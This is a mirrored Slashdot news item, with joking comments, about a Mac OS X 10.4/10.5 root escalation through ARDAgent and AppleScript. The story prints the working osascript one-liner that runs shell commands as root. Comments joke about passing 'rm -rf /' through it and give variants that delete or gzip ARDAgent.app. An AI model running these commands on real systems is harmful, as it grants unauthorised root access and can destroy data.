Slashdot Mirror


Mac OS X Root Escalation Through AppleScript

An anonymous reader writes "Half the Mac OS X boxes in the world (confirmed on Mac OS X 10.4 Tiger and 10.5 Leopard) can be rooted through AppleScript: osascript -e 'tell app "ARDAgent" to do shell script "whoami"'; Works for normal users and admins, provided the normal user wasn't switched to via fast user switching. Secure? I think not." On the other hand, since this exploit seems to require physical access to the machine to be rooted, you might have some other security concerns to deal with at that point, like keeping the intruder from raiding your fridge on his way out.

5 of 359 comments (clear)

  1. Re:Can we get some sources? by Anonymous Coward · · Score: 5, Funny

    who needs a source, it works. tried on my mac, output is: root

    so i tried replacing "whoami" with "rm -rf /" and

    !@#ca$a%H&(
    +++NO CARRIER

  2. Re:This is a serious privilege escalation bug, but by Applekid · · Score: 5, Funny

    . . . It's a classic blunder, like getting into a land war in Asia . . . 99 44/100 percent . . . Security is like sex. Once you're penetrated you're ****ed. You are now my new favorite poster.
    --
    More Twoson than Cupertino
  3. Re:Oh good by robfoo · · Score: 5, Funny

    Yeah, right.

  4. Re:Recipe for neutralizing it by eikonos · · Score: 5, Funny

    Why use sudo when you could just use the ARDAgent hack instead?
    osascript -e 'tell app "ARDAgent" to do shell script "gzip ARDAgent.app"';

  5. Re:Recipe for neutralizing it by aetherworld · · Score: 5, Funny

    Nononono....

    it's: osascript -e 'tell app "ARDAgent" to do shell script "rm -rf ARDAgent.app"';